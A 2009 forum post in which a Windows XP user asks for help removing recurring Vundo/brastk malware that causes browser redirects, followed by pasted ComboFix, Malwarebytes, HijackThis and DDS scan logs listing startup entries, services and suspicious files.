Jump to content

Trojan.Vundo.H / Brastk / Rootkitted and keep getting re-infected.


Recommended Posts

I keep essentially getting re-infected. I had Spybot S&D on, I've disabled that, and all other Anti-Virus solutions that run on a monitor and have attempted running combofix.

Combofix has solved some of the problems, but certain items keep going into my startup (via msconfig)

c:\windows\system32\brastk.exe

rundll32.exe "C:\WINDOWS\system32\wuyamoba.dll", b

keep running, and basically unless I directly a URL into the browser I get taken to a slew of other websites (some of which that say "hey wait 10 seconds while we try to install more malware".

Your help would be greatly appreciated!

ComboFix Log:

ComboFix 09-03-06.02 - Zack 2009-03-09 0:43:23.15 - NTFSx86

Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1023.620 [GMT -5:00]

Running from: c:\documents and settings\Zack\Desktop\ComboFix.exe

AV: Norton AntiVirus *On-access scanning disabled* (Updated)

AV: Trend Micro PC-cillin Internet Security 2006 *On-access scanning disabled* (Outdated)

FW: Trend Micro PC-cillin Internet Security (Firewall) *disabled*

.

((((((((((((((((((((((((( Files Created from 2009-02-09 to 2009-03-09 )))))))))))))))))))))))))))))))

.

2009-03-08 23:56 . 2009-03-08 23:56 <DIR> d-------- c:\documents and settings\Administrator\Application Data\Malwarebytes

2009-03-07 20:54 . 2009-03-07 20:54 <DIR> d-------- c:\documents and settings\Zack\Application Data\Malwarebytes

2009-03-07 20:53 . 2009-02-11 11:19 38,496 --a------ c:\windows\system32\drivers\mbamswissarmy.sys

2009-03-07 20:53 . 2009-02-11 11:19 15,504 --a------ c:\windows\system32\drivers\mbam.sys

2009-03-07 09:42 . 2009-03-07 09:42 <DIR> d-------- c:\documents and settings\All Users\Application Data\Symantec

2009-03-07 09:38 . 2009-03-07 09:37 36,272 -ra------ c:\windows\system32\drivers\SymIM.sys

2009-03-07 09:37 . 2009-03-07 09:37 <DIR> d-------- c:\program files\Symantec

2009-03-07 09:37 . 2009-03-07 09:52 <DIR> d-------- c:\program files\Common Files\Symantec Shared

2009-03-07 09:37 . 2009-03-07 09:37 124,464 --a------ c:\windows\system32\drivers\SYMEVENT.SYS

2009-03-07 09:37 . 2009-03-07 09:37 60,808 --a------ c:\windows\system32\S32EVNT1.DLL

2009-03-07 09:37 . 2009-03-07 09:37 10,635 --a------ c:\windows\system32\drivers\SYMEVENT.CAT

2009-03-07 09:37 . 2009-03-07 09:37 806 --a------ c:\windows\system32\drivers\SYMEVENT.INF

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\windows\system32\drivers\NAV

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\Windows Sidebar

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\NortonInstaller

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\program files\Norton AntiVirus

2009-03-07 09:36 . 2009-03-07 09:36 <DIR> d-------- c:\documents and settings\All Users\Application Data\NortonInstaller

2009-03-07 09:36 . 2009-03-07 09:41 <DIR> d-------- c:\documents and settings\All Users\Application Data\Norton

2009-03-07 07:11 . 2009-03-07 07:07 13,588 --a------ c:\windows\system32\wpa.dbl.bak

2009-03-07 07:08 . 2009-03-09 00:38 104 --a------ c:\windows\system32\NvApps.xml

2009-03-07 06:52 . 2009-03-09 00:38 13,588 --a------ c:\windows\system32\wpa.dbl

2009-03-07 04:23 . 2007-11-14 19:48 102,664 --a------ c:\windows\system32\drivers\tmcomm.sys

2009-03-04 23:57 . 2009-03-05 20:01 <DIR> d-------- c:\program files\eFile Express 2008

2009-03-03 04:48 . 2009-03-03 04:56 <DIR> d-------- C:\cygwin

2009-02-20 02:10 . 2009-02-20 02:10 966 --a------ c:\windows\STBC_DEMO.ini

2009-02-20 00:54 . 2009-02-20 00:54 <DIR> d-------- c:\documents and settings\All Users\Application Data\nView_Profiles

2009-02-20 00:41 . 2009-02-20 00:41 107 --a------ c:\windows\pccillin.ini

.

(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2009-03-09 05:41 --------- d-----w c:\program files\MySpace

2009-03-09 05:38 --------- d-----w c:\program files\Steam

2009-03-09 05:34 --------- d-----w c:\program files\Mozilla Thunderbird

2009-03-09 05:32 --------- d-----w c:\program files\BitTorrent

2009-03-09 02:24 --------- d---a-w c:\documents and settings\All Users\Application Data\TEMP

2009-03-09 02:24 --------- d-----w c:\program files\zMUD

2009-03-08 01:53 --------- d-----w c:\program files\Malwarebytes' Anti-Malware

2009-03-08 00:13 84,992 --sha-w c:\windows\system32\nelesoye.dll

2009-03-08 00:13 79,872 --sha-w c:\windows\system32\wuyamoba.dll

2009-03-07 09:51 --------- d-----w c:\program files\Spybot - Search & Destroy

2009-03-07 09:49 --------- d-----w c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy

2009-03-05 04:57 --------- d-----w c:\program files\eFile Express 2007

2009-02-25 21:42 --------- d-----w c:\documents and settings\Zack\Application Data\BitTorrent

2009-02-25 19:06 --------- d-----w c:\program files\Trillian

2009-02-20 07:09 --------- d-----w c:\program files\Activision

2009-02-05 02:46 --------- d-----w c:\program files\Alliance

2009-02-05 01:55 --------- d-----w c:\program files\SystemRequirementsLab

2009-02-05 01:55 --------- d-----w c:\documents and settings\Zack\Application Data\SystemRequirementsLab

2009-02-03 05:51 --------- d-----w c:\program files\ATITool

2009-02-03 03:02 --------- d--h--w c:\program files\InstallShield Installation Information

2009-02-03 03:02 --------- d-----w c:\program files\Intel

2009-02-02 22:44 --------- d-----w c:\documents and settings\Zack\Application Data\OpenOffice.org2

2009-01-13 02:40 137,688 ----a-w c:\windows\system32\drivers\PnkBstrK.sys

2009-01-13 02:39 202,040 ----a-w c:\windows\system32\PnkBstrB.exe

2009-01-09 19:30 --------- d-----w c:\program files\MultipleIEs

2008-12-20 23:15 826,368 ----a-w c:\windows\system32\wininet.dll

2007-10-20 00:56 479,232 ----a-w c:\program files\mozilla firefox\plugins\msvcm80.dll

2007-10-20 00:56 548,864 ----a-w c:\program files\mozilla firefox\plugins\msvcp80.dll

2007-10-20 00:56 626,688 ----a-w c:\program files\mozilla firefox\plugins\msvcr80.dll

2007-01-13 05:24 952 --sha-w c:\windows\system32\KGyGaAvL.sys

.

((((((((((((((((((((((((((((( SnapShot_2009-03-07_ 3.53.03.75 )))))))))))))))))))))))))))))))))))))))))

.

- 2005-10-21 02:02:28 163,328 ----a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE

+ 2005-10-21 01:02:28 163,328 ----a-w c:\windows\ERDNT\Hiv-backup\ERDNT.EXE

- 2000-08-31 14:00:00 29,696 ----a-w c:\windows\NIRCMD.exe

+ 2000-08-31 13:00:00 29,696 ----a-w c:\windows\NIRCMD.exe

- 2000-08-31 14:00:00 161,792 ----a-w c:\windows\SWREG.exe

+ 2000-08-31 13:00:00 161,792 ----a-w c:\windows\SWREG.exe

+ 2009-03-07 14:37:07 255,536 ----a-w c:\windows\system32\drivers\NAV\1002000.007\BHDrvx86.sys

+ 2009-03-07 14:37:07 362,544 ----a-w c:\windows\system32\drivers\NAV\1002000.007\cchpx86.sys

+ 2009-03-07 14:37:09 306,736 ----a-w c:\windows\system32\drivers\NAV\1002000.007\srtsp.sys

+ 2009-03-07 14:37:09 43,696 ----a-w c:\windows\system32\drivers\NAV\1002000.007\srtspx.sys

+ 2009-03-07 14:37:09 12,976 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symdns.sys

+ 2009-03-07 14:37:09 309,296 ----a-w c:\windows\system32\drivers\NAV\1002000.007\SymEFA.sys

+ 2009-03-07 14:37:09 89,904 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symfw.sys

+ 2009-03-07 14:37:09 34,608 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symids.sys

+ 2009-03-07 14:37:09 37,424 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symndis.sys

+ 2009-03-07 14:37:09 40,496 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symndisv.sys

+ 2009-03-07 14:37:09 24,624 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symredrv.sys

+ 2009-03-07 14:37:09 198,192 ----a-w c:\windows\system32\drivers\NAV\1002000.007\symtdi.sys

- 2008-11-12 19:17:13 66,960 ----a-w c:\windows\system32\perfc009.dat

+ 2009-03-08 08:19:17 66,960 ----a-w c:\windows\system32\perfc009.dat

- 2008-11-12 19:17:13 414,032 ----a-w c:\windows\system32\perfh009.dat

+ 2009-03-08 08:19:18 414,032 ----a-w c:\windows\system32\perfh009.dat

+ 2009-03-09 05:38:05 16,384 ----atw c:\windows\temp\Perflib_Perfdata_470.dat

.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))

.

.

*Note* empty entries & legit default entries are not shown

REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Steam"="c:\program files\steam\steam.exe" [2008-10-16 1410296]

"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-04 15360]

"brastk"="c:\windows\system32\brastk.exe" [bU]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"QuickTime Task"="c:\program files\QuickTime\qttask.exe" [2008-05-27 413696]

"IMONTRAY"="c:\program files\Intel\Intel® Active Monitor\imontray.exe" [2005-05-02 32768]

"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2008-05-16 13529088]

"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2008-05-16 86016]

"nugubinuvi"="c:\windows\system32\yuhasifo.dll" [bU]

"nwiz"="nwiz.exe" [2008-05-16 c:\windows\system32\nwiz.exe]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]

"vidc.ffds"= c:\progra~1\COMBIN~1\Filters\FFDShow\ff_vfw.dll

"aux1"= ctwdm32.dll

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Acrobat Assistant.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\Acrobat Assistant.lnk

backup=c:\windows\pss\Acrobat Assistant.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma Loader.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma Loader.lnk

backup=c:\windows\pss\Adobe Gamma Loader.lnkCommon Startup

[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]

path=c:\documents and settings\All Users\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk

backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\3c43874c]

--ahs---- 2009-03-07 19:13 79872 c:\windows\system32\wuyamoba.dll

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acrobat Assistant 8.0]

--a------ 2008-01-11 19:54 623992 c:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe_ID0EYTHM]

--a------ 2007-03-20 17:40 1884160 c:\progra~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]

--a------ 2008-07-10 09:47 116040 c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}]

--a------ 2006-10-09 12:28 139264 c:\program files\Common Files\Ahead\Lib\NMBgMonitor.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ctfmon.exe]

--a------ 2004-08-04 02:56 15360 c:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]

--a------ 2004-09-13 15:49 49152 c:\program files\HP\HP Software Update\hpwuSchd2.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]

--a------ 2008-07-30 10:47 289064 c:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]

--a------ 2006-01-12 17:40 155648 c:\program files\Common Files\Ahead\Lib\NeroCheck.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\pccguide.exe]

--a------ 2006-03-08 13:30 897089 c:\program files\Trend Micro\Internet Security 2006\pccguide.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWRISOVM.EXE]

--a------ 2006-11-06 03:27 200704 c:\program files\PowerISO\PWRISOVM.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]

--a------ 2008-05-27 10:50 413696 c:\program files\QuickTime\QTTask.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VirtualCloneDrive]

--a------ 2006-04-29 08:21 94208 c:\program files\Elaborate Bytes\VirtualCloneDrive\VCDDaemon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BluetoothAuthenticationAgent]

--a------ 2004-08-04 02:56 110592 c:\windows\system32\bthprops.cpl

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]

"ATI Smart"=2 (0x2)

"AVG Anti-Spyware Guard"=2 (0x2)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]

"AntiVirusDisableNotify"=dword:00000001

"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\TrendAntiVirus]

"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\TrendFirewall]

"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]

"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"=

"c:\\Games\\FreeSpace2\\fs2_open_r_20060425_Kara.exe"=

"c:\\Program Files\\Visicom Media\\AceFTP 3 Freeware\\aceftp3free.exe"=

"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=

"c:\\Program Files\\mIRC\\mirc.exe"=

"c:\\Program Files\\MSN Messenger\\msnmsgr.exe"=

"c:\\Program Files\\MSN Messenger\\livecall.exe"=

"c:\\Program Files\\Common Files\\Adobe\\Adobe Version Cue CS3\\Server\\bin\\VersionCueCS3.exe"=

"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=

"c:\\Program Files\\iTunes\\iTunes.exe"=

"c:\\WINDOWS\\system32\\javaw.exe"=

"c:\\Program Files\\EditPlus 2\\editplus.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\call of duty 4\\iw3sp.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\call of duty 4\\iw3mp.exe"=

"c:\\Program Files\\Steam\\steamapps\\common\\bioshock\\Builds\\Release\\Bioshock.exe"=

"c:\\Program Files\\Trillian\\trillian.exe"=

"c:\\combofix\\NirCmd.cfexe"=

"c:\\WINDOWS\\system32\\devldr32.exe"=

"c:\\WINDOWS\\notepad.exe"=

"c:\\WINDOWS\\system32\\taskmgr.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]

"3703:TCP"= 3703:TCP:Adobe Version Cue CS3 Server

"3704:TCP"= 3704:TCP:Adobe Version Cue CS3 Server

"50900:TCP"= 50900:TCP:Adobe Version Cue CS3 Server

"50901:TCP"= 50901:TCP:Adobe Version Cue CS3 Server

R0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\NAV\1002000.007\SymEFA.sys [2009-03-07 309296]

R1 BHDrvx86;Symantec Heuristics Driver;c:\windows\system32\drivers\NAV\1002000.007\BHDrvx86.sys [2009-03-07 255536]

R1 ccHP;Symantec Hash Provider;c:\windows\system32\drivers\NAV\1002000.007\cchpx86.sys [2009-03-07 362544]

R1 IDSxpx86;IDSxpx86;c:\documents and settings\All Users\Application Data\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\Definitions\IPSDefs\20090303.001\IDSxpx86.sys [2009-03-07 276344]

R1 vcdrom;Virtual CD-ROM Device Driver;c:\windows\system32\drivers\VCdRom.sys [2006-10-17 8576]

R2 Norton AntiVirus;Norton AntiVirus;c:\program files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe [2009-03-07 115560]

R2 Tmfilter;Tmfilter;c:\windows\system32\drivers\tmxpflt.sys [2005-11-09 197648]

R2 Tmpreflt;Tmpreflt;c:\windows\system32\drivers\tmpreflt.sys [2005-11-09 31248]

R3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2009-03-07 101936]

R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2009-03-07 38496]

S2 Tmntsrv;Trend Micro Real-time Service;c:\progra~1\TRENDM~1\INTERN~1\Tmntsrv.exe [2006-03-08 340040]

S2 TmPfw;Trend Micro Personal Firewall;c:\progra~1\TRENDM~1\INTERN~1\TmPfw.exe [2006-03-15 634944]

S2 tmproxy;Trend Micro Proxy Service;c:\progra~1\TRENDM~1\INTERN~1\tmproxy.exe [2006-03-15 286791]

S3 ctgame;Game Port;c:\windows\system32\drivers\ctgame.sys [2006-09-14 19128]

S3 ICAM3NT5;Intel USB Video Camera III;c:\windows\system32\drivers\Icam3.sys [2006-09-13 141056]

--- Other Services/Drivers In Memory ---

*NewlyCreated* - MBAMSWISSARMY

.

Contents of the 'Scheduled Tasks' folder

2009-03-02 c:\windows\Tasks\AppleSoftwareUpdate.job

- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 12:34]

.

- - - - ORPHANS REMOVED - - - -

BHO-{fa59a23f-d93e-4c80-8122-076fc2f90f9a} - (no file)

HKCU-Run-BitTorrent - c:\program files\BitTorrent\bittorrent.exe

MSConfigStartUp-BitTorrent - c:\program files\BitTorrent\bittorrent.exe

MSConfigStartUp-MySpaceIM - c:\program files\MySpace\IM\MySpaceIM.exe

.

------- Supplementary Scan -------

.

uStart Page = hxxp://www.google.com

mStart Page = hxxp://www.google.com

IE: Append to existing PDF

IE: Convert link target to Adobe PDF

IE: Convert link target to existing PDF

IE: Convert selected links to Adobe PDF

IE: Convert selected links to existing PDF

IE: Convert selection to Adobe PDF

IE: Convert selection to existing PDF

IE: Convert to Adobe PDF

DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab

DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab

FF - ProfilePath - c:\documents and settings\Zack\Application Data\Mozilla\Firefox\Profiles\23knc70b.default\

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava11.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava12.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava13.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava14.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJava32.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPJPI150_06.dll

FF - plugin: c:\program files\Java\jre1.5.0_06\bin\NPOJI610.dll

FF - plugin: c:\program files\Mozilla Firefox\plugins\npbittorrent.dll

FF - plugin: c:\program files\Mozilla Firefox\plugins\NPTURNMED.dll

.

**************************************************************************

catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net

Rootkit scan 2009-03-09 00:46:31

Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully

hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Norton AntiVirus]

"ImagePath"="\"c:\program files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe\" /s \"Norton AntiVirus\" /m \"c:\program files\Norton AntiVirus\Engine\16.2.0.7\diMaster.dll\" /prefetch:1"

.

--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(1244)

c:\windows\system32\Ati2evxx.dll

.

Completion time: 2009-03-09 0:56:31

ComboFix-quarantined-files.txt 2009-03-09 05:56:26

ComboFix2.txt 2009-03-09 04:58:26

ComboFix3.txt 2009-03-09 04:29:40

ComboFix4.txt 2009-03-08 02:29:22

ComboFix5.txt 2009-03-09 05:43:02

Pre-Run: 4,713,451,520 bytes free

Post-Run: 4,693,299,200 bytes free

269 --- E O F --- 2009-02-25 19:01:19

MBAM Log:

Malwarebytes' Anti-Malware 1.34

Database version: 1828

Windows 5.1.2600 Service Pack 2

3/9/2009 1:04:29 AM

mbam-log-2009-03-09 (01-04-29).txt

Scan type: Quick Scan

Objects scanned: 51028

Time elapsed: 4 minute(s), 45 second(s)

Memory Processes Infected: 0

Memory Modules Infected: 0

Registry Keys Infected: 0

Registry Values Infected: 0

Registry Data Items Infected: 0

Folders Infected: 0

Files Infected: 1

Memory Processes Infected:

(No malicious items detected)

Memory Modules Infected:

(No malicious items detected)

Registry Keys Infected:

(No malicious items detected)

Registry Values Infected:

(No malicious items detected)

Registry Data Items Infected:

(No malicious items detected)

Folders Infected:

(No malicious items detected)

Files Infected:

\Check for Quake III Arena Updates.exe (Trojan.Lop.H) -> Quarantined and deleted successfully.

HJT Log:

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 1:06:35 AM, on 3/9/2009

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v7.00 (7.00.6000.16791)

Boot mode: Normal

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

C:\Program Files\Bonjour\mDNSResponder.exe

C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

C:\WINDOWS\system32\nvsvc32.exe

C:\WINDOWS\system32\HPZipm12.exe

C:\WINDOWS\system32\PnkBstrA.exe

C:\WINDOWS\system32\PnkBstrB.exe

C:\WINDOWS\system32\svchost.exe

C:\Program Files\Intel\Intel® Active Monitor\imonnt.exe

C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

C:\Program Files\Intel\Intel® Active Monitor\imontray.exe

C:\WINDOWS\system32\RUNDLL32.EXE

C:\program files\steam\steam.exe

C:\WINDOWS\system32\devldr32.exe

C:\WINDOWS\system32\ctfmon.exe

C:\WINDOWS\system32\wscntfy.exe

C:\WINDOWS\system32\rundll32.exe

C:\Documents and Settings\Zack\Desktop\ATF-Cleaner.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Program Files\Adobe\Acrobat 8.0\Acrobat\Acrobat.exe

C:\WINDOWS\system32\taskmgr.exe

C:\Program Files\Mozilla Firefox\firefox.exe

C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe

C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE

C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe

C:\WINDOWS\system32\notepad.exe

C:\WINDOWS\explorer.exe

C:\WINDOWS\system32\NOTEPAD.EXE

C:\WINDOWS\system32\wuauclt.exe

C:\WINDOWS\system32\NOTEPAD.EXE

C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: Symantec Intrusion Prevention - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\IPSBHO.DLL

O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll

O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS3/contributeieplugin.dll

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [iMONTRAY] C:\Program Files\Intel\Intel® Active Monitor\imontray.exe

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} -

O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1158227831203

O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdat...b?1166482132296

O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll (file missing)

O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe

O23 - Service: Adobe Version Cue CS3 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS3\Server\bin\VersionCueCS3.exe

O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe

O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe

O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe

O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe

O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe

O23 - Service: Intel® Active Monitor (imonNT) - Intel Corp. - C:\Program Files\Intel\Intel® Active Monitor\imonnt.exe

O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe

O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe

O23 - Service: Norton AntiVirus - Symantec Corporation - C:\Program Files\Norton AntiVirus\Engine\16.2.0.7\ccSvcHst.exe

O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe

O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe

O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe

O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe

O23 - Service: PnkBstrB - Unknown owner - C:\WINDOWS\system32\PnkBstrB.exe

O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe

O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe

O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe

O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe

--

End of file - 5940 bytes

DDS.scr Attach / Log

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

DDS (Ver_09-02-01.01)

Microsoft Windows XP Professional

Boot Device: \Device\HarddiskVolume1

Install Date: 12/18/2006 4:38:48 PM

System Uptime: 3/8/2009 11:36:33 PM (2 hours ago)

Motherboard: Intel Corporation | | D875PBZ

Processor: Intel® Pentium® 4 CPU 2.80GHz | J2E1 | 2793/200mhz

Processor: Intel® Pentium® 4 CPU 2.80GHz | J2E1 | 2793/200mhz

==== Disk Partitions =========================

A: is Removable

C: is FIXED (NTFS) - 112 GiB total, 4.382 GiB free.

F: is CDROM (UDF)

G: is CDROM (CDFS)

H: is CDROM ()

==== Disabled Device Manager Items =============

==== System Restore Points ===================

RP19: 12/9/2008 3:38:37 PM - System Checkpoint

RP20: 12/10/2008 1:00:16 PM - Software Distribution Service 3.0

RP21: 12/11/2008 1:00:18 PM - Software Distribution Service 3.0

RP22: 12/12/2008 2:37:39 PM - System Checkpoint

RP23: 12/13/2008 2:37:57 PM - System Checkpoint

